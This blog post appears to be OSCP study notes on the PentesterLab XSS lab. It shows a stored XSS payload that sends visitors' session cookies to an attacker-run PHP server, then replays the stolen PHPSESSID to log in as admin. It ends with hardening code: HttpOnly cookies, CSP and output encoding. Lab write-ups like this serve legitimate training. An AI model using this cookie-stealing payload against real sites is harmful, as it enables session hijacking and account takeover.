OSCP Security Technology - Cross-Site Scripting(XSS)

Installing XSS & MySQL FILE

https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/

Exploit this VM

Find the IP address of the XSS_MySQL_File virtual machine.

netdiscover

Browse this PentesterLab vulnerable blog through Firefox.

Click the Test button and find a good place to test XSS.

<script>alert('XSS')</script>

Submit this query. Every time we refresh the website, we will see the alert.

Create an index.php file in the root folder.

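nano index.php
<?php
// Read the "test" query parameter (empty string if it is absent).
// The value is not stored anywhere; the request line, including the
// query string, appears in the console log of the php -S server.
$cookie = isset($_GET["test"])?$_GET["test"]:"";

?>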

Stop Apache and run the PHP built-in web server.

service apache2 stop
php -S 192.168.2.26:80

Submit a new query.

<script>location.href='http://192.168.2.26/index.php?test='+document.cookie;</script>

Then we can find the PHPSESSID on the backend (a0b4od8kee0jlj9oeumjb819t3).

Install Firefox Add-on - Cookie Quick Manager.

Click the Manage all Cookies button.

Edit the cookie: replace its current value with the one found on the backend, then save it.

Refresh the website and click the Admin button; we are then logged in without a username and password.

We can post a new blog now.
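
The steps above work for two reasons: the blog writes stored comment text into the page without HTML encoding, and its session cookie is readable from script. The PHP below is an added example, not code from the lab VM or from PentesterLab; the function names are hypothetical, and it assumes PHP 7.3+ and a site served over HTTPS.

```php
<?php
// Added example. Function names are hypothetical; the lab blog's own
// source code is not shown on this page. Requires PHP 7.3+.

// Session cookie that script cannot read: with HttpOnly set,
// document.cookie no longer includes PHPSESSID.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,    // assumption: the site is served over HTTPS
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Defence in depth: a policy without 'unsafe-inline' makes the browser
// refuse inline <script> blocks even if one reaches the page.
function send_security_headers(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

// Vulnerable pattern: stored text is concatenated into HTML as-is.
function render_comment_unsafe(string $text): string
{
    return '<p>' . $text . '</p>';
}

// Hardened pattern: encode at output time so markup characters are
// shown as text instead of being parsed as HTML.
function render_comment(string $text): string
{
    return '<p>' . htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

// Constructed sample input: the alert test string used earlier on this page.
$stored = "<script>alert('XSS')</script>";

echo "unsafe:   ", render_comment_unsafe($stored), PHP_EOL;
echo "hardened: ", render_comment($stored), PHP_EOL;
```

In a web request, call start_hardened_session() and send_security_headers() before any output is sent.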

posted @ 2021-08-08 18:02  晨风_Eric